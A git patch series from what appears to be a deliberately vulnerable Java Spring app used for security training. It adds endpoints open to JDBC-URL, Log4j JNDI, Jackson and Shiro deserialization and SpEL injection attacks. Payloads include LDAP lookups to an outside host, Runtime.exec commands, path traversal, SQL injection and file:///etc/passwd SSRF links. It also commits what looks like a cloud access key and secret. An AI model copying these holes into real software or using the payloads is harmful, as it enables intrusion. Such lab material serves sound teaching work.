-    <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-metadata:1.2.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
-    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.20" level="project" />
-    <orderEntry type="library" name="Maven: org.yaml:snakeyaml:1.21" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
-    <orderEntry type="library" name="Maven: org.hamcrest:hamcrest-core:1.3" level="project" />
-    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.4" level="project" />
-    <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
-    <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
-    <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
-    <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.data:spring-data-commons:1.13.11.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: com.jayway.jsonpath:json-path:2.2.0" level="project" />
-    <orderEntry type="library" name="Maven: net.minidev:json-smart:2.2.1" level="project" />
-    <orderEntry type="library" name="Maven: net.minidev:accessors-smart:1.1" level="project" />
-    <orderEntry type="library" name="Maven: org.xmlbeam:xmlprojector:1.4.13" level="project" />
-    <orderEntry type="library" name="Maven: org.postgresql:postgresql:42.3.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.checkerframework:checker-qual:3.5.0" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 8da3449d..e2a62e75 100644
--- a/pom.xml
+++ b/pom.xml
@@ -337,6 +337,13 @@
             <version>42.3.1</version>
         </dependency>
 
+        <!-- jdbc db2 rce -->
+        <dependency>
+            <groupId>com.ibm.db2</groupId>
+            <artifactId>jcc</artifactId>
+            <version>11.5.8.0</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/Jdbc.java b/src/main/java/org/joychou/controller/Jdbc.java
new file mode 100644
index 00000000..79154c1e
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Jdbc.java
@@ -0,0 +1,36 @@
+package org.joychou.controller;
+
+import lombok.extern.slf4j.Slf4j;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import java.sql.DriverManager;
+
+/**
+ * Jdbc Attack @2023.04
+ */
+@Slf4j
+@RestController
+@RequestMapping("/jdbc")
+public class Jdbc {
+
+    /**
+     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
+     */
+    @RequestMapping("/postgresql")
+    public void postgresql(String jdbcUrlBase64) throws Exception{
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+
+    @RequestMapping("/db2")
+    public void db2(String jdbcUrlBase64) throws Exception{
+        Class.forName("com.ibm.db2.jcc.DB2Driver");
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+}
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
index ada8a394..e5dbc83a 100644
--- a/src/main/java/org/joychou/controller/Log4j.java
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -26,4 +26,9 @@ public String log4j(String token) {
         }
     }
 
+    public static void main(String[] args) {
+        String poc = "${jndi:ldap://127.0.0.1:1389/f616nl}";
+        logger.error(poc);
+    }
+
 }
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index a87a9672..b64d57bf 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -58,8 +58,7 @@ public String CommandExec(String cmd) {
 
 
     /**
-     * http://localhost:8080/rce/ProcessBuilder?cmd=whoami
-     * @param cmd cmd
+     * <a href="http://localhost:8080/rce/ProcessBuilder?cmd=whoami">POC</a>
      */
     @GetMapping("/ProcessBuilder")
     public String processBuilder(String cmd) {
@@ -131,16 +130,10 @@ public void groovyshell(String content) {
         groovyShell.evaluate(content);
     }
 
-    /**
-     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
-     */
-    @RequestMapping("/postgresql")
-    public void postgresql(String jdbcUrlBase64) throws Exception{
-        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
-        String jdbcUrl = new String(b);
-        log.info(jdbcUrl);
-        DriverManager.getConnection(jdbcUrl);
-    }
 
+
+    public static void main(String[] args) throws Exception{
+        Runtime.getRuntime().exec("touch /tmp/x");
+    }
 }
 
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 08f3073e..58e90739 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -436,8 +436,8 @@ public interface UserPayload {
             String getUserName();
         }
 
+    public static void main(String[] args) {
 
-    public static void main(String[] args)  {
     }
 
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 71abc91e..c2b3896a 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -188,6 +188,7 @@ public static String host2ip(String host) {
             InetAddress IpAddress = InetAddress.getByName(host);
             return IpAddress.getHostAddress();
         } catch (Exception e) {
+            logger.error("host2ip exception " + e.getMessage());
             return "";
         }
     }
@@ -198,45 +199,57 @@ public static String host2ip(String host) {
      * @return Octal ip returns true, others return false. 012.23.78.233 return true. 012.0x17.78.233 return false.
      */
     public static boolean isOctalIP(String host) {
-        String[] ipParts = host.split("\\.");
-        StringBuilder newDecimalIP = new StringBuilder();
-        boolean is_octal = false;
-
-        // Octal ip only has number and dot character.
-        if (isNumberOrDot(host)) {
-
-            // not support ipv6
-            if (ipParts.length > 4) {
-                throw new SSRFException("Illegal ipv4: " + host);
-            }
-
-            // 01205647351
-            if( ipParts.length == 1 && host.startsWith("0") ) {
-                decimalIp = Integer.valueOf(host, 8).toString();
-                return true;
-            }
+        try{
+            String[] ipParts = host.split("\\.");
+            StringBuilder newDecimalIP = new StringBuilder();
+            boolean is_octal = false;
+
+            // Octal ip only has number and dot character.
+            if (isNumberOrDot(host)) {
+
+                // not support ipv6
+                if (ipParts.length > 4) {
+                    logger.error("Illegal ipv4: " + host);
+                    return false;
+                }
 
-            // 012.23.78.233
-            for(String ip : ipParts) {
-                if (!isNumber(ip)){
-                    throw new SSRFException("Illegal ipv4: " + host);
+                // 01205647351
+                if( ipParts.length == 1 && host.startsWith("0") ) {
+                    decimalIp = Integer.valueOf(host, 8).toString();
+                    return true;
                 }
-                if (ip.startsWith("0")) {
-                    if (Integer.valueOf(ip, 8) >= 256){
-                        throw new SSRFException("Illegal ipv4: " + host);
+
+                // 012.23.78.233
+                for(String ip : ipParts) {
+                    if (!isNumber(ip)){
+                        logger.error("Illegal ipv4: " + host);
+                        return false;
                     }
-                    newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
-                    is_octal = true;
-                }else{
-                    if (Integer.valueOf(ip, 10) >= 256) {
-                        throw new SSRFException("Illegal ipv4: " + host);
+                    // start with "0", but not "0"
+                    if (ip.startsWith("0") && !ip.equals("0")) {
+                        if (Integer.valueOf(ip, 8) >= 256){
+                            logger.error("Illegal ipv4: " + host);
+                            return false;
+                        }
+                        newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
+                        is_octal = true;
+                    }else{
+                        if (Integer.valueOf(ip, 10) >= 256) {
+                            logger.error("Illegal ipv4: " + host);
+                            return false;
+                        }
+                        newDecimalIP.append(ip).append(".");
                     }
-                    newDecimalIP.append(ip).append(".");
                 }
+                // delete last char .
+                decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
             }
-            decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
+            return is_octal;
+        } catch (Exception e){
+            logger.error("SSRFChecker isOctalIP exception: " + e.getMessage());
+            return false;
         }
-        return is_octal;
+
     }
 
     /**
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index d5c6d5ab..66bdb978 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -9,8 +9,6 @@ logging.level.org.joychou.mapper=debug
 
 # Spring Boot Actuator Config
 management.security.enabled=false
-endpoints.enabled=true
-
 
 # logging.config=classpath:logback-online.xml
 
@@ -55,3 +53,6 @@ joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**,
 
 # http header max size
 #server.max-http-header-size=30000
+
+jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
+jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
\ No newline at end of file
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 057aa067..4c116cb3 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -20,6 +20,7 @@
     <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
     <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
     <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
+    <a th:href="@{/env}">actuator env</a>
 </p>
 
 <P>

From 0c253adbed202b0cbef401a375cfb7b2c8a773e1 Mon Sep 17 00:00:00 2001
From: wzqs <71961807+wzqs@users.noreply.github.com>
Date: Wed, 24 May 2023 22:39:44 +0800
Subject: [PATCH 096/108] Update index.html

fix '/rce/exec' path error
---
 src/main/resources/templates/index.html | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 4c116cb3..7e7061be 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -17,7 +17,7 @@
     <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
     <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
     <a th:href="@{/ssrf/urlConnection/vuln?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
-    <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
+    <a th:href="@{/rce/runtime/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
     <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
     <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
     <a th:href="@{/env}">actuator env</a>
@@ -31,4 +31,4 @@
 <a th:href="@{/logout}">logout</a>
 
 </body>
-</html>
\ No newline at end of file
+</html>

From 920bd93a25730695985ecd1a8c1bda5c738bbdf5 Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Wed, 27 Dec 2023 12:24:23 +0800
Subject: [PATCH 097/108] fix #78

---
 README.md                                     |  1 +
 README_zh.md                                  |  1 +
 java-sec-code.iml                             |  6 ++
 pom.xml                                       | 65 ++++++++++++++++++-
 src/main/java/org/joychou/Application.java    |  1 -
 .../joychou/config/TomcatFilterMemShell.java  | 19 +-----
 .../org/joychou/controller/Deserialize.java   | 14 ++++
 .../org/joychou/controller/FileUpload.java    |  2 +-
 .../java/org/joychou/controller/Jsonp.java    |  3 +-
 src/main/java/org/joychou/controller/Jwt.java |  4 +-
 .../java/org/joychou/controller/Log4j.java    | 17 ++---
 src/main/java/org/joychou/controller/Rce.java |  1 -
 .../java/org/joychou/controller/Shiro.java    | 49 ++++++++++++++
 .../java/org/joychou/controller/SpEL.java     | 50 ++++++++++----
 .../java/org/joychou/controller/Test.java     | 36 ----------
 .../othervulns/xlsxStreamerXXE.java           |  1 -
 .../org/joychou/security/SecurityUtil.java    |  4 +-
 .../java/org/joychou/util/CookieUtils.java    | 13 ++++
 src/main/resources/application.properties     |  3 +-
 src/main/resources/templates/login.html       |  4 +-
 20 files changed, 203 insertions(+), 91 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Shiro.java
 delete mode 100644 src/main/java/org/joychou/controller/Test.java

diff --git a/README.md b/README.md
index 52642169..e7fbef9e 100644
--- a/README.md
+++ b/README.md
@@ -47,6 +47,7 @@ Sort by letter.
   - ScriptEngine
   - Yaml Deserialize  
   - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
diff --git a/README_zh.md b/README_zh.md
index 70e68837..f713e6cc 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -42,6 +42,7 @@ joychou/joychou123
     - ScriptEngine
     - Yaml Deserialize
     - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 1daccaec..5c58c92b 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -1,5 +1,11 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <module version="4">
+  <component name="AdditionalModuleElements">
+    <content url="file://$MODULE_DIR$" dumb="true">
+      <sourceFolder url="file://$MODULE_DIR$/spring-cloud-gateway-helloworld" isTestSource="false" />
+      <sourceFolder url="file://$MODULE_DIR$/src/main/test" isTestSource="true" />
+    </content>
+  </component>
   <component name="FacetManager">
     <facet type="Spring" name="Spring">
       <configuration />
diff --git a/pom.xml b/pom.xml
index e2a62e75..c62d938c 100644
--- a/pom.xml
+++ b/pom.xml
@@ -12,7 +12,6 @@
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
         <maven.compiler.target>1.8</maven.compiler.target>
-        <tomcat.version>8.5.85</tomcat.version>
     </properties>
 
 
@@ -197,11 +196,12 @@
             <version>1.7</version>
         </dependency>
 
-        <!-- rce -->
+
         <dependency>
             <groupId>com.thoughtworks.xstream</groupId>
             <artifactId>xstream</artifactId>
-            <version>1.4.10</version>
+            <!-- For testing, you can use the vulnerable version of 1.4.10. -->
+            <version>1.4.20</version> <!-- use latest version to exploit vuln by using xstream.addPermission-->
         </dependency>
 
         <dependency>
@@ -344,6 +344,65 @@
             <version>11.5.8.0</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.apache.shiro</groupId>
+            <artifactId>shiro-core</artifactId>
+            <version>1.2.4</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-databind</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-annotations</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-core</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+
+        <!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
+        <dependency>
+            <groupId>org.jsecurity</groupId>
+            <artifactId>jsecurity</artifactId>
+            <version>0.9.0</version>
+        </dependency>
+
+
+        <!-- 为了使用SimpleEvaluationContext，该类需要spring-expression版本大于等于4.3.15 -->
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-expression</artifactId>
+            <version>4.3.16.RELEASE</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
+        <dependency>
+            <groupId>com.h2database</groupId>
+            <artifactId>h2</artifactId>
+            <version>1.4.199</version>
+            <scope>test</scope>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-dbcp</artifactId>
+            <version>9.0.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>QLExpress</artifactId>
+            <version>3.3.1</version>
+        </dependency>
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 41169b9a..afdf6f56 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -5,7 +5,6 @@
 import org.springframework.boot.builder.SpringApplicationBuilder;
 import org.springframework.boot.web.servlet.ServletComponentScan;
 import org.springframework.boot.web.support.SpringBootServletInitializer;
-import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
 @ServletComponentScan // do filter
diff --git a/src/main/java/org/joychou/config/TomcatFilterMemShell.java b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
index be7a1b1c..15822d59 100644
--- a/src/main/java/org/joychou/config/TomcatFilterMemShell.java
+++ b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
@@ -1,10 +1,5 @@
 package org.joychou.config;
 
-import com.sun.org.apache.xalan.internal.xsltc.DOM;
-import com.sun.org.apache.xalan.internal.xsltc.TransletException;
-import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
-import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
-import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 import java.lang.reflect.Field;
 import org.apache.catalina.core.StandardContext;
 import java.io.IOException;
@@ -19,8 +14,8 @@
 import javax.servlet.*;
 import java.util.*;
 
-@Component
-public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
+//@Component
+public class TomcatFilterMemShell implements Filter {
     static{
         try {
             System.out.println("Tomcat filter backdoor class is loading...");
@@ -75,16 +70,6 @@ public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
     }
 
 
-    @Override
-    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
-
-    }
-
-    @Override
-    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
-
-    }
-
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
 
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 1ca5ff43..55c82ab2 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
 import org.joychou.config.Constants;
 import org.joychou.security.AntObjectInputStream;
 import org.slf4j.Logger;
@@ -83,4 +84,17 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
         return "I'm very OK.";
     }
 
+    // String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\", {\"jndiNames\":\"ldap://30.196.97.50:1389/yto8pc\"}]";
+    @RequestMapping("/jackson")
+    public void Jackson(String payload) {
+        ObjectMapper mapper = new ObjectMapper();
+        mapper.enableDefaultTyping();
+        try {
+            Object obj = mapper.readValue(payload, Object.class);
+            mapper.writeValueAsString(obj);
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+    }
+
 }
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index 00ab7008..a1858a12 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -195,4 +195,4 @@ private static boolean isImage(File file) throws IOException {
         BufferedImage bi = ImageIO.read(file);
         return bi != null;
     }
-}
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/Jsonp.java b/src/main/java/org/joychou/controller/Jsonp.java
index 2ab0dcef..eb9381e3 100644
--- a/src/main/java/org/joychou/controller/Jsonp.java
+++ b/src/main/java/org/joychou/controller/Jsonp.java
@@ -6,8 +6,8 @@
 import com.alibaba.fastjson.JSONPObject;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang.StringUtils;
-import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.joychou.security.SecurityUtil;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
@@ -19,7 +19,6 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 
diff --git a/src/main/java/org/joychou/controller/Jwt.java b/src/main/java/org/joychou/controller/Jwt.java
index 522fd44a..f3e4c126 100644
--- a/src/main/java/org/joychou/controller/Jwt.java
+++ b/src/main/java/org/joychou/controller/Jwt.java
@@ -33,7 +33,9 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque
         String loginUser = request.getUserPrincipal().getName();
         log.info("Current login user is " + loginUser);
 
-        CookieUtils.deleteCookie(response, COOKIE_NAME);
+        if (!CookieUtils.deleteCookie(response, COOKIE_NAME)){
+            return String.format("%s cookie delete failed", COOKIE_NAME);
+        }
         String token = JwtUtils.generateTokenByJavaJwt(loginUser);
         Cookie cookie = new Cookie(COOKIE_NAME, token);
 
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
index e5dbc83a..b2ea4060 100644
--- a/src/main/java/org/joychou/controller/Log4j.java
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -2,7 +2,7 @@
 
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
-import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
@@ -11,23 +11,18 @@ public class Log4j {
     private static final Logger logger = LogManager.getLogger("Log4j");
 
     /**
-     * http://localhost:8080/log4j?token=${jndi:ldap://wffsr5.dnslog.cn:9999}
+     * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75}
      * Default: error/fatal/off
      * Fix: Update log4j to lastet version.
-     * @param token token
      */
-    @GetMapping("/log4j")
+    @RequestMapping(value = "/log4j")
     public String log4j(String token) {
-        if(token.equals("java-sec-code")) {
-            return "java sec code";
-        } else {
-            logger.error(token);
-            return "error";
-        }
+        logger.error(token);
+        return token;
     }
 
     public static void main(String[] args) {
-        String poc = "${jndi:ldap://127.0.0.1:1389/f616nl}";
+        String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}";
         logger.error(poc);
     }
 
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index b64d57bf..7c5f30a9 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -15,7 +15,6 @@
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
-import java.sql.DriverManager;
 
 
 /**
diff --git a/src/main/java/org/joychou/controller/Shiro.java b/src/main/java/org/joychou/controller/Shiro.java
new file mode 100644
index 00000000..2dc143ca
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Shiro.java
@@ -0,0 +1,49 @@
+package org.joychou.controller;
+
+
+import lombok.extern.slf4j.Slf4j;
+import org.apache.shiro.crypto.AesCipherService;
+import org.joychou.config.Constants;
+import org.joychou.util.CookieUtils;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.*;
+import static org.springframework.web.util.WebUtils.getCookie;
+
+@Slf4j
+@RestController
+public class Shiro {
+
+    byte[] KEYS = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
+    private final static String DELETE_ME = "deleteMe";
+    AesCipherService acs = new AesCipherService();
+
+
+    @GetMapping(value = "/shiro/deserialize")
+    public String shiro_deserialize(HttpServletRequest req, HttpServletResponse res) {
+        Cookie cookie = getCookie(req, Constants.REMEMBER_ME_COOKIE);
+        if (null == cookie) {
+            return "No rememberMe cookie. Right?";
+        }
+
+        try {
+            String rememberMe = cookie.getValue();
+            byte[] b64DecodeRememberMe = java.util.Base64.getDecoder().decode(rememberMe);
+            byte[] aesDecrypt = acs.decrypt(b64DecodeRememberMe, KEYS).getBytes();
+            ByteArrayInputStream bytes = new ByteArrayInputStream(aesDecrypt);
+            ObjectInputStream in = new ObjectInputStream(bytes);
+            in.readObject();
+            in.close();
+        } catch (Exception e){
+            if (CookieUtils.addCookie(res, "rememberMe", DELETE_ME)){
+                log.error(e.getMessage());
+                return "RememberMe cookie decrypt error. Set deleteMe cookie success.";
+            }
+        }
+
+        return "Shiro deserialize";
+    }
+}
diff --git a/src/main/java/org/joychou/controller/SpEL.java b/src/main/java/org/joychou/controller/SpEL.java
index 698f4a7e..452180b8 100644
--- a/src/main/java/org/joychou/controller/SpEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -1,38 +1,64 @@
 package org.joychou.controller;
 
+import org.springframework.expression.Expression;
 import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.common.TemplateParserContext;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
-import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.expression.spel.support.SimpleEvaluationContext;
+import org.springframework.expression.spel.support.StandardEvaluationContext;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
 
 /**
- * SpEL Injection
- *
+ * SpEL Injection.
  * @author JoyChou @2019-01-17
  */
 @RestController
 public class SpEL {
 
     /**
-     * SpEL to RCE
-     * http://localhost:8080/spel/vul/?expression=xxx.
-     * xxx is urlencode(exp)
-     * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+     * Use Spel to execute cmd. <p>
+     * T(java.lang.Runtime).getRuntime().exec("open -a Calculator")
      */
-    @GetMapping("/spel/vuln")
-    public String rce(String expression) {
+    @RequestMapping("/spel/vuln1")
+    public String spel_vuln1(String value) {
         ExpressionParser parser = new SpelExpressionParser();
-        // fix method: SimpleEvaluationContext
-        return parser.parseExpression(expression).getValue().toString();
+        return parser.parseExpression(value).getValue().toString();
+    }
+
+    /**
+     * Use Spel to execute cmd. <p>
+     * #{T(java.lang.Runtime).getRuntime().exec('open -a Calculator')}
+     * Exploit must add <code>#{}</code> if using TemplateParserContext.
+     */
+    @RequestMapping("spel/vuln2")
+    public String spel_vuln2(String value) {
+        StandardEvaluationContext context = new StandardEvaluationContext();
+        SpelExpressionParser parser = new SpelExpressionParser();
+        Expression expression = parser.parseExpression(value, new TemplateParserContext());
+        Object x = expression.getValue(context);    // trigger vulnerability point
+        return x.toString();   // response
+    }
+
+    /**
+     * Use SimpleEvaluationContext to fix.
+     */
+    @RequestMapping("spel/sec")
+    public String spel_sec(String value) {
+        SimpleEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();
+        SpelExpressionParser parser = new SpelExpressionParser();
+        Expression expression = parser.parseExpression(value, new TemplateParserContext());
+        Object x = expression.getValue(context);
+        return x.toString();
     }
 
     public static void main(String[] args) {
         ExpressionParser parser = new SpelExpressionParser();
-        String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
+        String expression = "1+1";
         String result = parser.parseExpression(expression).getValue().toString();
         System.out.println(result);
     }
+
 }
 
diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java
deleted file mode 100644
index 3b75c7d0..00000000
--- a/src/main/java/org/joychou/controller/Test.java
+++ /dev/null
@@ -1,36 +0,0 @@
-package org.joychou.controller;
-
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-import org.springframework.web.bind.annotation.RestController;
-
-import javax.servlet.http.Cookie;
-import javax.servlet.http.HttpServletResponse;
-
-@RestController
-@RequestMapping("/test")
-public class Test {
-
-    @RequestMapping(value = "/")
-    public String Index(HttpServletResponse response, String empId) {
-
-        System.out.println(empId);
-        Cookie cookie = new Cookie("XSRF-TOKEN", "123");
-        cookie.setDomain("taobao.com");
-        cookie.setMaxAge(-1); // forever time
-        response.addCookie(cookie);
-        return "success";
-    }
-
-
-    @RequestMapping(value = "/aa")
-    public void test(HttpServletResponse response, String empId) {
-
-        System.out.println(empId);
-        Cookie cookie = new Cookie("XSRF-TOKEN", "123");
-        cookie.setDomain("taobao.com");
-        cookie.setMaxAge(-1); // forever time
-        response.addCookie(cookie);
-    }
-}
